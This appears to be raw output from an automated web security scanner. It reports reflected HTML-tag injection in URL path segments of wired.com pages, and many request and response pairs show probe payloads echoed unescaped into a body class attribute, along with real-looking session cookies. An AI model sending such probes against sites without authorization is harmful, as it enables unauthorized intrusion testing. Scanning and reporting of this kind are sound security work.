GET /science/discoveries/newsb8d6e"><a>917d98e62c1/2008/08/dayintech_0814 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:35 GMT Date: Sun, 21 Nov 2010 23:12:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsb8d6e"><a>917d98e62c1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65655"><a>3b9c63b3795 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science65655"><a>3b9c63b3795/discoveries/news/2008/09/dayintech_0909 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:53 GMT Date: Sun, 21 Nov 2010 23:11:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science65655"><a>3b9c63b3795 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c62f1"><a>7d6cf2b9f7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesc62f1"><a>7d6cf2b9f7d/news/2008/09/dayintech_0909 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:11 GMT Date: Sun, 21 Nov 2010 23:12:11 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesc62f1"><a>7d6cf2b9f7d c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 565ee"><a>1a0dac16008 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news565ee"><a>1a0dac16008/2008/09/dayintech_0909 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:22 GMT Date: Sun, 21 Nov 2010 23:12:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news565ee"><a>1a0dac16008"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c521b"><a>72e918e3af1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencec521b"><a>72e918e3af1/discoveries/news/2008/09/dayintech_0918 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:35 GMT Date: Sun, 21 Nov 2010 23:11:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_sciencec521b"><a>72e918e3af1 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2adc6"><a>beef516bcac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries2adc6"><a>beef516bcac/news/2008/09/dayintech_0918 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:50 GMT Date: Sun, 21 Nov 2010 23:11:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries2adc6"><a>beef516bcac c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4249"><a>a52de65f3e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newse4249"><a>a52de65f3e1/2008/09/dayintech_0918 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:04 GMT Date: Sun, 21 Nov 2010 23:12:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newse4249"><a>a52de65f3e1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7b0f"><a>3dff3cb2f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienced7b0f"><a>3dff3cb2f8/discoveries/news/2008/09/dayintech_0924 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29319 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:31 GMT Date: Sun, 21 Nov 2010 23:11:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienced7b0f"><a>3dff3cb2f8 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7f61"><a>3d1be35ff38 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesf7f61"><a>3d1be35ff38/news/2008/09/dayintech_0924 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:47 GMT Date: Sun, 21 Nov 2010 23:11:47 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesf7f61"><a>3d1be35ff38 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4422"><a>a534ad9c864 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsd4422"><a>a534ad9c864/2008/09/dayintech_0924 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:59 GMT Date: Sun, 21 Nov 2010 23:11:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_newsd4422"><a>a534ad9c864"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba756"><a>b214819a45e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceba756"><a>b214819a45e/discoveries/news/2008/10/dayintech_1009 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:08 GMT Date: Sun, 21 Nov 2010 23:12:08 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceba756"><a>b214819a45e ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c8bf"><a>b68eabdde0a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries1c8bf"><a>b68eabdde0a/news/2008/10/dayintech_1009 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:26 GMT Date: Sun, 21 Nov 2010 23:12:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries1c8bf"><a>b68eabdde0a c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1072c"><a>d415fcc8a35 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news1072c"><a>d415fcc8a35/2008/10/dayintech_1009 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:38 GMT Date: Sun, 21 Nov 2010 23:12:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news1072c"><a>d415fcc8a35"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d636"><a>723f04a76bb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science8d636"><a>723f04a76bb/discoveries/news/2008/10/dayintech_1014 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:09 GMT Date: Sun, 21 Nov 2010 23:12:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science8d636"><a>723f04a76bb ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bced9"><a>8dfd94670a4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesbced9"><a>8dfd94670a4/news/2008/10/dayintech_1014 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:25 GMT Date: Sun, 21 Nov 2010 23:12:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesbced9"><a>8dfd94670a4 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 448da"><a>54c19bc128c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news448da"><a>54c19bc128c/2008/10/dayintech_1014 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:22:37 GMT Date: Sun, 21 Nov 2010 23:12:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news448da"><a>54c19bc128c"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57bba"><a>ebeb21542cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science57bba"><a>ebeb21542cb/discoveries/news/2008/11/dayintech_1110 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:14 GMT Date: Sun, 21 Nov 2010 23:11:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science57bba"><a>ebeb21542cb ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efacc"><a>98895960f43 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesefacc"><a>98895960f43/news/2008/11/dayintech_1110 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:21:30 GMT Date: Sun, 21 Nov 2010 23:11:30 GMT Connection: close
